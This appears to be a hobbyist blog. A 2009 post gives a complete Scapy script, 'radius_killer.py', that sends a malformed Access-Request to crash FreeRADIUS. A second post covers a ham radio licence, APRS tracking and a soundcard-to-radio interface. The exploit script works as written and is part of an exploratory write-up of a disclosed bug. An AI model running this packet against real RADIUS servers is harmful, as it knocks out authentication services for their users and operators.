I haven’t had a chance to use Scapy in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to Hping. Scapy almost fits the bill.

Earlier today, while reading through Full Disclosure, I came across something interesting: a Freeradius DoS bug. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their Trac.

So, download the layer to scapy/layers, ensure that it imports the required items:

import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius

Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
print “Usage: radius_killer.py <radiushost>\n”
sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
Radius(code=1,authenticator=”\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99″,id=180)/ \
RadiusAttr(type=69,value=””,len=2)

send(PoD)

(download)

Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust.  Correct me if I’m wrong. Either way, updated packages are available.

A couple months back,  I finally took my Amature Radio Technicians exam. The exam location nearest me gave the exam for free, and with only 35 questions it doesn’t involve copius amounts of studying.

After a friend opened my eyes to a few fun things one can do w/ a radio scanner, I went on a “learning tangent”, reading and talking to people w/ Amature licenses, digesting everything that one can do w/ a radio these days.

One of the things that’s interested me the most is APRS. Using Xastir, one can track mobile and static APRS stations in your area.

There’s some interesting stuff out there – in my area there’s a trucker (N6GVG) that I’ve followed, making runs from West Virginia, to Tennesse, to Pennsylvania, and from there to New Jersey. (I’m a HUGE fan of Open Transport Tycoon Deluxe, if you’ve not played it – seriously, get it. I only wish American trains were equiped w/ APRS)

I’d purchased a Yaesu-VX7R from ebay for just under $290.00.

With the amature license in tow (KB3TCN), I decided I’d start sending out my own beacons. Problem was, I couldn’t figure out how to interface my soundcard (I’m using soundmodem) with the Yaesu. I’d already purchased the CT-91 cable from ebay (it splits out from a 4 tipped 3.5mm plug to a 3.5mm headphone plug and 2.5mm mic input), but simply connecting the soundcard to the mic input (using an adapter) didn’t work (and was probably incredibly stupid to try). Doing so keeps the radio keyed, and I’m sure is bad.

After talking to the gang on freenode:#hamradio and looking at the manual for TNC connection, it turns out the solution is fairly simple – two interfaces utilizing various isolation transformers (see http://www.qsl.net/wm2u/interface.html for a good intro, I’ll post my modified schematics shortly… I actually wrote this post months ago)

The optimal voltage is 5mV with 2kohms of resistance. My circuit gets it pretty close (btw, I can’t take responsibility for any harm this circuit causes, use at your own discretion. Seriously, don’t trust my judgement – this is how I change a car tire).

Anyway, it’s working for me. I had to pump the soundcard output up pretty high, but I’ve got my beacon reportedly seen by others. (It’s been a few weeks since I’ve transmitted, as my next project is to do a PIC based tracker for my car)